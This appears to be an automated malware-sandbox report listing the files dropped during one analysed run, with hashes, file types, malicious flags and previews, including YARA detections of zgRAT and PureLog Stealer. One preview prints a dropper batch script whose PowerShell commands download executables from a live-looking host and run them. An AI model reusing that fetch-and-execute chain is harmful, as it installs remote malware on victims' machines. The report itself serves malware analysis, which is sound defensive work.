Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vc4djh0s.pl0.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vxcnj0df.tn2.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wb12hcsw.i21.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_x3noldoj.f32.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zylvcivl.rjp.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\f09d2dcf

Download File

Process:	C:\Users\user\AppData\Local\Temp\u2xs.2\run.exe
File Type:	data
Category:	dropped
Size (bytes):	1514213
Entropy (8bit):	7.760260480757416
Encrypted:	false
SSDEEP:	24576:rj/90C+h3cEnea9Q1QjEceGvAhXGbbn+gYVtQ5qRfAdvPcI7xYAKZ1vb:NT4R5yQjEcHaGn+gYbQrnczvZ1vb
MD5:	D1B33813CE63E8979E134417AD550C9D
SHA1:	1DA1401405DFBBD1CC73B8587A347ECED5A8CC9C
SHA-256:	360EB53FC0947706A107F1749CFE73834C1F053C06FA92641C55A808E3ED5ECF
SHA-512:	553E7E630B12F226162157D976275CE2F220B896903F09C83469F0CFE1731B222A11F45595ECA888DB4F19B24F79A9EC3AD922DB07DBB5BEC09765FB16581F48
Malicious:	false
Reputation:	unknown
Preview:	...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F../F.L~..Lz..Qc/..A5.kZ..d@".z]..yO4.-c#.xr..bI4.`]..yO4.x^F...F...F...F...F...F...F...F...F...F...F...F.bg(.yG'.dT#.u.F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F.bm4.lZ#.c]2.cM#...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F.Zg..D\|c.@G%.b]).y...Yr..lC#.b\-...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F.?.v.8.q.:.F...F...F...F...F...F...F...F...F...F...F

C:\Users\user\AppData\Local\Temp\i1.exe

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	452609
Entropy (8bit):	7.154557093612799
Encrypted:	false
SSDEEP:	12288:NVRBcNop3qLuzIn/bpRKrdjOIAUQAXZw9:NxSWdjr5TZw9
MD5:	22B610EEDBB3591F31508E1912ED5B01
SHA1:	C2C4D4E5096927C3566F168BCF245B4A9368DBB9
SHA-256:	82BFF5C441390A63EE744341EF0C2A0A7A02B4AE371C4EDF19274CFC1FAB626F
SHA-512:	D0E65CA7BE82D766329688AA6FAA54AC0F0EE1F17DE5578754CD0412515F5FA989F04D764011B9FBA72B0E036B517A0F6726E01C4A17D068822D7022E5C396DB
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......v<.U2]..2]..2]..?.,..]..?...L]..?....]..;%`.1]..2]..^]......3]..?.(.3]....-.3]..Rich2]..................PE..L....P)d............................GC............@..........................................................................s..(....P...m......................d.......8............................h..@...............\|............................text............................... ..`.rdata..2l.......n..................@..@.data................r..............@....rsrc....m...P...n...f..............@..@.reloc..d...........................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\i3.exe

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	6655374
Entropy (8bit):	7.996049468519515
Encrypted:	true
SSDEEP:	98304:91OKgXBN1VgdzizwHQ2GL/CkhgwS8PMvH2UOaKWZ8oOZ5FsferUP:91O3Xf1Vgw0Q2GekhBTUpKiTOZ5FrrUP
MD5:	DA30CEE1E6389704275CA7868FC7AD1F
SHA1:	5D91B696CC285ECB25677A4C971E824BCA01CF5B
SHA-256:	61F20D7F650A4D289C931CFEB29798C2328D276FE9BCAF93DB069EF65A23B280
SHA-512:	755B58289881117D134D0BAF9960CFB8F444B0EA398502F47F34595892612A5F4D73F7084DCDF82ECCBCDC7B3582C720C0B79D58C830D1A53B6EEEEC63A4EF67
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........W..s...s...s...}...s...y..s...,...s...r.!.s.......s...x..s.......s.......s.^.u...s.Rich..s.........PE..L....S.L.............................K............@.............................................................................d....p..`............................................................................................................text.............................. ..`.rdata...D.......F..................@..@.data...HZ.......2..................@....sxdata......`......................@....rsrc...`....p......................@..@................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\iolo\dm\BIT157D.tmp

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	59721128
Entropy (8bit):	7.894297326209827
Encrypted:	false
SSDEEP:	1572864:JLZ1CnPCEBSFRBOf4E/wGfVRMTytvAavLTr:VCnPCbFRBDgzVftvh
MD5:	8E9C467EAC35B35DA1F586014F29C330
SHA1:	0DD19EA3C791BB453AB530CA65CA12A680E67B65
SHA-256:	02FA8D1A57CF9AAB766303A3436E6CC4AE6AAA3348549A6E218437E7D10DC134
SHA-512:	D7FAEF92E675064375B1D1CC13F326FED60673B32FAAED5C33EF5255890A72C031E9C5F1B86D2801774E2E47F9A5CD16C66C54398954F57336B07EEAA0E9E49E
Malicious:	true
Yara Hits:	Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\iolo\dm\BIT157D.tmp, Author: Joe Security Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\AppData\Local\Temp\iolo\dm\BIT157D.tmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\Temp\iolo\dm\BIT157D.tmp, Author: Joe Security Rule: MALWARE_Win_zgRAT, Description: Detects zgRAT, Source: C:\Users\user\AppData\Local\Temp\iolo\dm\BIT157D.tmp, Author: ditekSHen
Antivirus:	Antivirus: ReversingLabs, Detection: 12%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.... ;..........."...0.....V.......... ........@.. ..............................Tp....`....................................O.......\|S...............)...`.........8............................................ ............... ..H............text....... ..................... ..`.rsrc...\|S.......T.................@..@.reloc.......`......................@..B.......................H.......\|...........q...d....P...........................................r...psR........~.....o^.........s.........~....~D...%-.&~C.........s....%.D...o.......0..K........r...p}.....(....o....o....o....}#....(.....r...pr...pr...pr...p( ...&.r...pr...pr...pr...p( ...&.r...pr...pr...pr...p( ...&.r...pr...pr...pr...p( ...&.r...pr...pr...pr...p( ...&.r...pr...pr...pr...p( ...&.r;..pr...pr...prA..p( ...&.r...pr...pr...pr...p( ...&.r...pr...pr...pr...p( ...&.r...pr...pr...pr...p(

C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe (copy)

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	59721128
Entropy (8bit):	7.894297326209827
Encrypted:	false
SSDEEP:	1572864:JLZ1CnPCEBSFRBOf4E/wGfVRMTytvAavLTr:VCnPCbFRBDgzVftvh
MD5:	8E9C467EAC35B35DA1F586014F29C330
SHA1:	0DD19EA3C791BB453AB530CA65CA12A680E67B65
SHA-256:	02FA8D1A57CF9AAB766303A3436E6CC4AE6AAA3348549A6E218437E7D10DC134
SHA-512:	D7FAEF92E675064375B1D1CC13F326FED60673B32FAAED5C33EF5255890A72C031E9C5F1B86D2801774E2E47F9A5CD16C66C54398954F57336B07EEAA0E9E49E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 12%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.... ;..........."...0.....V.......... ........@.. ..............................Tp....`....................................O.......\|S...............)...`.........8............................................ ............... ..H............text....... ..................... ..`.rsrc...\|S.......T.................@..@.reloc.......`......................@..B.......................H.......\|...........q...d....P...........................................r...psR........~.....o^.........s.........~....~D...%-.&~C.........s....%.D...o.......0..K........r...p}.....(....o....o....o....}#....(.....r...pr...pr...pr...p( ...&.r...pr...pr...pr...p( ...&.r...pr...pr...pr...p( ...&.r...pr...pr...pr...p( ...&.r...pr...pr...pr...p( ...&.r...pr...pr...pr...p( ...&.r;..pr...pr...prA..p( ...&.r...pr...pr...pr...p( ...&.r...pr...pr...pr...p( ...&.r...pr...pr...pr...p(

C:\Users\user\AppData\Local\Temp\iolo\dm\ioloDMLog.txt

Download File

Process:	C:\Users\user\AppData\Local\Temp\u2xs.3.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	5189
Entropy (8bit):	5.481021012877117
Encrypted:	false
SSDEEP:	96:EtwuBVmegKjYw3bLCy8IPNPNPePePeP/P/P/P/PWPWPWPWPWPWPlPlPgFuqfP2O:xXegKjYw3bLCy8IPNPNPePePeP/P/P/e
MD5:	82B8B75E289D7AFFABF1404FFD2EF430
SHA1:	58E4CB83C3445459C3177CB1DC655BFF5FEE6F6C
SHA-256:	D9400ACB8C3506BE4B33E4DCD7A7796AAAC11067FFF6C5D9602523CBDCB0DD35
SHA-512:	90866DE55A647C1B39FFA3D5D586857712F26B492BF1EE115147008FE25A649008184B81487BF00813BB48D3D05364176BE2D8879880A1954C08CEEB28C2FE58
Malicious:	false
Reputation:	unknown
Preview:	[04/26/24 17:11:30] Main : OS Version = osWin10...[04/26/24 17:11:30] CommandLineSwitchExists : Result of check = False. Param Value (if not exact match) = ...[04/26/24 17:11:31] Installer Target URL request = {"IPAddress":"192.168.2.5","Status":1,"Language":"en","OSMinorVersion":0,"OSMajorVersion":10,"ProductId":"5488CB36-BE62-4606-B07B-2EE938868BD1","Is64Bit":true,"ECommId":"11A12794-499E-4FA0-A281-A9A9AA8B2685"}...[04/26/24 17:11:32] Installer target url response = {"Url":"https://download.iolo.net/sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.0.57/SystemMechanic.exe","ProductName":"System Mechanic Standard","Result":0,"ErrorMessage":null}...[04/26/24 17:11:32] DownloadAndLaunchInstaller : Creating BITS download handler...[04/26/24 17:11:32] !&TioloBITSHandler.InitCopyMgr : CreateCOMObject(CLSID_BackgroundCopyManager1_5)..[04/26/24 17:11:36] !&TioloBITSHandler.InitCopyMgr : Copy manager initialized = True...[04/26/24 17:11:36] DownloadAndLaunchInstaller : Target folder ="C:\User

C:\Users\user\AppData\Local\Temp\nsvE79C.tmp\INetC.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	25600
Entropy (8bit):	5.391050633650523
Encrypted:	false
SSDEEP:	384:pjj9e9dE95XD+iTx58Y5oMM3O9MEoLr1VcQZ/ZwcSyekMRlZ4L4:dAvE90GuY2tO93oLrJRM7Z4E
MD5:	40D7ECA32B2F4D29DB98715DD45BFAC5
SHA1:	124DF3F617F562E46095776454E1C0C7BB791CC7
SHA-256:	85E03805F90F72257DD41BFDAA186237218BBB0EC410AD3B6576A88EA11DCCB9
SHA-512:	5FD4F516CE23FB7E705E150D5C1C93FC7133694BA495FB73101674A528883A013A34AB258083AA7CE6072973B067A605158316A4C9159C1B4D765761F91C513D
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'9<.cXR.cXR.cXR.D.).jXR.cXS.6XR.D. .`XR.D.(.bXR.D...bXR.D.*.bXR.RichcXR.........................PE..L....T.[...........!.....@...j.......E.......P.......................................................................M..l...\F..d.......(.......................\.......................................................d............................text...\>.......@.................. ..`.data...dW...P.......D..............@....rsrc...(............R..............@..@.reloc..\............\..............@..B................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nsvE79C.tmp\lood.bat

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	693
Entropy (8bit):	5.52306618115351
Encrypted:	false
SSDEEP:	12:/kCX80qwTwXp2NO980qwTwXEbHDS8YGCiZL+MUAwwTwX2RCX80qwTwXJE:MeiZ2NoiUbHPRL+MUzmoiZE
MD5:	B3370DB0FABEB3A7D6A9221F5B03D984
SHA1:	1834CE744A9498810C1964144662F3260A3CB3F8
SHA-256:	A222779606D0CED41E7466AA8AC266B9774F96E4F46DDF349D4CE4FA5E0A1CB1
SHA-512:	FD3D42DDEC767A846158DFEBED8A887367194B2EB994DB251B1DCD4A4463616A2A08E98B0D3712D0ACF017242270129468D52C0496103FFF44EE3B3EA1E08BEF
Malicious:	true
Reputation:	unknown
Preview:	@ECHO OFF..cd %TEMP%..powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d68kcn56pzfb4.cloudfront.net/load/th.php?c=1000','stat')"..powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d68kcn56pzfb4.cloudfront.net/load/dl.php?id=425&c=1000','i1.exe')"..START i1.exe /SUB=2838 /str=one..powershell -command "$cli = New-Object System.Net.WebClient;$cli.Headers['User-Agent'] = 'InnoDownloadPlugin/1.5';$cli.DownloadFile('https://d68kcn56pzfb4.cloudfront.net/load/dl.php?id=444', 'i2.bat')"..START i2.bat..cd %TEMP%..powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d68kcn56pzfb4.cloudfront.net/load/dl.php?id=456','i3.exe')"..START i3.exe

C:\Users\user\AppData\Local\Temp\orvniumtri

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Apr 24 04:56:20 2024, mtime=Fri Apr 26 14:11:20 2024, atime=Wed Apr 24 04:56:20 2024, length=2469936, window=hide
Category:	dropped
Size (bytes):	1064
Entropy (8bit):	4.989651873610461
Encrypted:	false
SSDEEP:	12:85JowAv14fN88CylsapSRaLgKEw/OraARjA2tnA0awuLw0rWr34t2YZ/elFlSJm1:85fmCfe855SRAgKZOraeA+n2Qzqygm
MD5:	7243F8B7F3E6528B32DECA95AFFD2399
SHA1:	5494C3E9626CDF650027BF4CE1D6D71D5260B4CB
SHA-256:	93067C4943F6D95D1D947DE5E6B212F1C633A693B1568B2DDC6A0346EE2162F2
SHA-512:	C6D189EA12EB1B295916015D8E37C74F3619C1F1439D60909CF28F06A2A46E50B1BEFA987627BE264ADD1AA580C372057F98A801F9897210FF0A246844977EBD
Malicious:	false
Reputation:	unknown
Preview:	L..................F.... ....Z.!....L......Z.!....0.%.......................:..DG..Yr?.D..U..k0.&...&...... M.....j......j.........t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSl.XYy....B.....................Bdg.A.p.p.D.a.t.a...B.P.1......XWy..Local.<......DWSl.XYy....V.........................L.o.c.a.l.....N.1......Xqy..Temp..:......DWSl.Xqy....\.....................K.-.T.e.m.p.....T.1......Xiy..u2xs.2..>......Xhy.Xiy............................K.u.2.x.s...2.....V.2.0.%..X./ .run.exe.@......X./.Xky..............................r.u.n...e.x.e.......`...............-......._...........W.u......C:\Users\user\AppData\Local\Temp\u2xs.2\run.exe......\.u.2.x.s...2.\.r.u.n...e.x.e.........\|....I.J.H..K..:...`.......X.......899552...........hT..CrF.f4... .^3.@.....,...W..hT..CrF.f4... .^3.@.....,...W..............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.2.4.6.1.2.2.6.5.8.-.3.6.9.3.4.0.5.1.1.7.-.2.4.7.6.7.5.6.6.3.4.-.1.0.0.3.........9

C:\Users\user\AppData\Local\Temp\tmp1FAB.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6732424250451717
Encrypted:	false
SSDEEP:	24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
MD5:	CFFF4E2B77FC5A18AB6323AF9BF95339
SHA1:	3AA2C2115A8EB4516049600E8832E9BFFE0C2412
SHA-256:	EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
SHA-512:	0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp1FBB.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6732424250451717
Encrypted:	false
SSDEEP:	24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
MD5:	CFFF4E2B77FC5A18AB6323AF9BF95339
SHA1:	3AA2C2115A8EB4516049600E8832E9BFFE0C2412
SHA-256:	EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
SHA-512:	0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp1FCC.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6732424250451717
Encrypted:	false
SSDEEP:	24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
MD5:	CFFF4E2B77FC5A18AB6323AF9BF95339
SHA1:	3AA2C2115A8EB4516049600E8832E9BFFE0C2412
SHA-256:	EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
SHA-512:	0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpC25E.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 5, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 5
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.8568920569523718
Encrypted:	false
SSDEEP:	24:TLVF1kwNbXYFpFNYcw+6UwcQVXH5fB87sdD+4bYGmQ01OpjGEa:ThFawNLopFgU10XJB84dD+4BmT14S
MD5:	2D200E1DBEBD8EE6590AC7A0FB9059F1
SHA1:	6BE0AB4EE221380D2927F7C4AF282F6BE27E2043
SHA-256:	C60239CFE72DB620B64B1798F77A724250EBF602BE0BB628F69B84C46F9D639A
SHA-512:	54C186D100333E237178E8C8AF540753D7FDBA93E22BB5705CD0195D42DF98F8F024FDEC24A26ED7DA0007986DD581A109DC4E29DA7D9D86A13D090B28F4AD09
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\u2xs.0.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\i1.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	305152
Entropy (8bit):	6.506610743512134
Encrypted:	false
SSDEEP:	6144:4Q5dL9gu4rEt4xLSCKXGZH9N9ab2pWVQJGfX9:4Q5d5gVro4xLDKXGZH93aapkQAX9
MD5:	BE531DFDB40E97826D86E1FB73FA73C8
SHA1:	12F16E6983D1C911B7ED1A485CDBE706C48D78ED
SHA-256:	D42D82224B04DE2AFE5659A7FC3EE03BA255A76F58445D10FC14093B1565B24C
SHA-512:	7CE943E84F69CC19BC0DCA2597F74F6ED464E4B2B6935D1E63BE854F5947530089045A60CF0578AC8C2DF58E9E50C2BD69CE3A707090F9BB09394E01C5AE614B
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......v<.U2]..2]..2]..?.,..]..?...L]..?....]..;%`.1]..2]..^]......3]..?.(.3]....-.3]..Rich2]..................PE..L.....=e............................GC............@.................................PR.......................................s..(.... ..pj......................d.......8............................h..@...............\|............................text............................... ..`.rdata..2l.......n..................@..@.data................r..............@....rsrc...pj... ...l...(..............@..@.reloc..d...........................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\u2xs.1.zip

Download File

Process:	C:\Users\user\AppData\Local\Temp\i1.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Category:	dropped
Size (bytes):	3884863
Entropy (8bit):	7.9982714074161665
Encrypted:	true
SSDEEP:	98304:7goFFJ7lj6j1elkeoTNxPxDZhAryYACWcTIxlN+ba:7guJ7wpfTDPxD0P2YG
MD5:	78D3CA6355C93C72B494BB6A498BF639
SHA1:	2FA4E5DF74BFE75C207C881A1B0D3BC1C62C8B0E
SHA-256:	A1DD547A63B256AA6A16871ED03F8B025226F7617E67B8817A08444DF077B001
SHA-512:	1B2DF7BEE2514AEE7EFD3579F5DD33C76B40606D07DBA69A34C45747662FAD61174DB4931BCA02B058830107959205E889FEE74F8CCC9F6E03F9FD111761F4EA
Malicious:	false
Reputation:	unknown
Preview:	PK.........?.X........I......bunch.dat\]...:.... "...T.......N<wf..X $;.e..)....\|u]+...UV.~.....f.Rje.......@.f.r..V....J-.#U.....=.T..E.5.Z..&..z...'.k..%..Je.....[5.....P..B...@........G..z[.-B1....Jz#....%.J...j...W........>62.jK(...........E.T.Q}.j._I..R.TEj.>..O..:J%o.......`.f+O...W>.....S.INC.m.6..\|wQ.xk.K.....o.D....:.n4....P>..M._\|...P.R@.gW...k..X...MbM.....H....... .....#o.CC.!...1!R.g....Qc "P....Q.3.H.B.F.\|...)...........@..W.6..Z..7.9.....d'`_.6.zr%a......7.,...l....h.v......P.O.f..!..Y..#..Y.7..g..v=..k....J...N#\.5.....]......<.VGU.~....,..X.o.k..#..?v..%.0.+...m.(m..ah.JG>.....m..V......kb...B.jX...V$p... ..?.<....^...%KA=0\.(......Q.l>.;x..#W.@@.tIU ...Q............./e.7Ew..}h..^N... ........+.........bRz.........2r.f..u'o..s.}1...j.{.'%.......?..Z..M.....9.\|P..W.o...c...3....H\.4..B......;14.65.Q3....24$...2(..9j......!.$..<<....P#b..Lj.D.vG.+.}.T..6tR..b."..o.f...h>.......Z..5.(....]........

C:\Users\user\AppData\Local\Temp\u2xs.2\UIxMarketPlugin.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\i1.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1640960
Entropy (8bit):	6.484662993855079
Encrypted:	false
SSDEEP:	49152:/7Q2CH7FiYk7q8wOP2nyh9VgFdJYZL6MsQv4Pvg3KIA8wuSgKacXTT3Kos2lpm:sZH7FZk7LP2nyh9VgFdJYZL6NQgPVIAv
MD5:	D1BA9412E78BFC98074C5D724A1A87D6
SHA1:	0572F98D78FB0B366B5A086C2A74CC68B771D368
SHA-256:	CBCEA8F28D8916219D1E8B0A8CA2DB17E338EB812431BC4AD0CB36C06FD67F15
